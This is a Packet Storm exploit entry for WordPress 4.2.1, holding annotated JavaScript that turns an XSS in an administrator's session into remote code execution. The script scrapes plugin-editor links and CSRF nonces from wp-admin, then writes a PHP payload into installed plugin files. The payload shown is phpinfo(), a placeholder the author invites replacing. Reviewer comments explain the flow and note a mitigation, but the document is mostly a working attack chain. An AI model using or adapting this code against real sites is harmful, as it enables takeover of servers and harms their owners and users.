WordPress 4.2.1 XSS / Code Execution

2015-05-05T00:00:00
ID PACKETSTORM:131769
Type packetstorm
Reporter Evex
Modified 2015-05-05T00:00:00

Description

                                        
                                            `/*  
Author: @Evex_1337  
Title: Wordpress XSS to RCE  
Description: This exploit chains an XSS vulnerability in a WordPress
plugin, theme or core into remote code execution: once the payload runs in the
browser of an administrator-privileged user, it uses the built-in plugin editor
to write PHP into an installed plugin file. ¯\_(ツ)_/¯
Reference: http://research.evex.pw/?vuln=14  
Enjoy.  
  
*/  
// ---------------------------------------------------------------------------
// Reviewer notes (not part of the original advisory text):
//  * This is a browser-side second stage. It only does anything when it is
//    executed inside an already-authenticated wp-admin session: it depends on
//    the page's global `jQuery` and on the victim's cookies being attached to
//    every jQuery.ajax() call below. Run standalone it just throws.
//  * Flow: GET plugins.php -> collect every "?file=" (plugin editor) link ->
//    for each link GET the editor page, scrape `_wpnonce` out of it, prepend a
//    PHP payload to the file body and POST it back with action=update.
//  * The CSRF nonce is read out of the fetched page, so WordPress' nonce check
//    is no defence here: once script runs in the admin's origin every
//    same-origin token is readable. What would neuter this stage is the site
//    exposing no "?file=" editor links at all (presumably the
//    DISALLOW_FILE_EDIT setting -- verify), which makes the loop a no-op.
//  * Every variable is an implicit global and every request is a synchronous
//    XHR. Both are deliberately left untouched: the final comment ("this is up
//    to you") implies a follow-on stage reads `injected_file`/`file` from the
//    global scope, and the whole control flow relies on each callback having
//    completed before the next statement runs.
// ---------------------------------------------------------------------------
//Installed Plugins Page
// Relative URL: use 'plugins.php' when the XSS fired on an admin page,
// otherwise prefix 'wp-admin/'. NOTE(review): the second form resolves
// relative to the current page's directory, so it only lands on the right
// URL when the page sits at the site root -- verify against the target.
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ?
'plugins.php' : 'wp-admin/plugins.php';
//Inject "XSS" Div
// Hidden scratch container; fetched admin pages are parsed into it so they can
// be queried with jQuery selectors.
jQuery('body').append('<div id="xss" ></div>');
xss_div = jQuery('#xss');
xss_div.hide();
//Get Installed Plugins Page Source and Append it to "XSS" Div
// Synchronous GET so xss_div is populated before the .find('a') below runs.
// NOTE(review): jQuery's .html() falls back to .append() for markup that
// contains <script>, which executes those scripts -- so the admin page's own
// inline scripts presumably run in the victim's page as a side effect; confirm.
jQuery.ajax({
url: plugins,
type: 'GET',
async: false,
cache: false,
timeout: 30000,
success: function (txt) {
xss_div.html(txt);
}
});
//Put All Plugins Edit URL in Array
// One entry per plugin that has an "Edit" link (href containing "?file=").
// NOTE(review): an <a> without an href yields undefined here and .indexOf
// would throw, aborting the whole stage -- assumes every anchor has an href.
plugins_edit = [
];
xss_div.find('a').each(function () {
if (jQuery(this).attr('href').indexOf('?file=') != - 1) {
plugins_edit.push(jQuery(this).attr('href'));
}
});
//Inject Payload
// Walk the editor links in order; all requests are synchronous, so
// plugins_edit[i] is still the current link inside the nested callbacks.
for (var i = 0; i < plugins_edit.length; i++) {
jQuery.ajax({
url: plugins_edit[i],
type: 'GET',
async: false,
cache: false,
timeout: 30000,
success: function (txt) {
xss_div.html(txt);
// Scrape the nonce with a regex built from a string. NOTE(review): the
// string literal below is shown wrapped across two lines by the page; it
// must be a single line ('name="_wpnonce" value="(.*?)"') to parse.
// `.context` (the document, for a selector query in jQuery < 3) means the
// entire body is scanned, not just form#template -- verify on the target
// jQuery version.
_wpnonce =
jQuery('form#template').context.body.innerHTML.match('name="_wpnonce"
value="(.*?)"') [1];
// Current file body from the editor textarea; the payload is prepended so
// the original plugin code is preserved and keeps working.
old_code = jQuery('form#template div textarea#newcontent') [0].value;
payload = '<?php phpinfo(); ?>';
new_code = payload + '\n' + old_code;
// NOTE(review): everything after "file=" is taken verbatim, so any further
// query parameters on the link would end up in `file` -- verify link shape.
file = plugins_edit[i].split('file=') [1];
// Replay the editor form: same fields the "Update File" button submits.
jQuery.ajax({
url: plugins_edit[i],
type: 'POST',
data: {
'_wpnonce': _wpnonce,
'newcontent': new_code,
'action': 'update',
'file': file,
'submit': 'Update File'
},
async: false,
cache: false,
timeout: 30000,
success: function (txt) {
xss_div.html(txt);
// Success check: the response page's textarea now contains the payload.
if (jQuery('form#template div textarea#newcontent')
[0].value.indexOf(payload) != - 1) {
// Passed, this is up to you ( skiddies Filter :D )
// URL of the now-modified plugin file, left in a global for a follow-on
// stage. NOTE(review): the next line appears to be the tail of this
// comment wrapped onto its own line by the page; as written it parses as
// an `http:` label followed by a line comment, so it is harmless.
injected_file = window.location.href.split('wp-admin') [0] +
'/wp-content/plugins/' + file; //
http://localhost/wp//wp-content/plugins/504-redirects/redirects.php
// Throwing is the only way to leave the for loop from inside a callback;
// presumably intended to stop after the first successful write. Whether
// the exception propagates out of a sync ajax callback depends on the
// jQuery version (jQuery 3 catches callback errors) -- verify.
throw new Error('');
}
}
});
}
});
}
`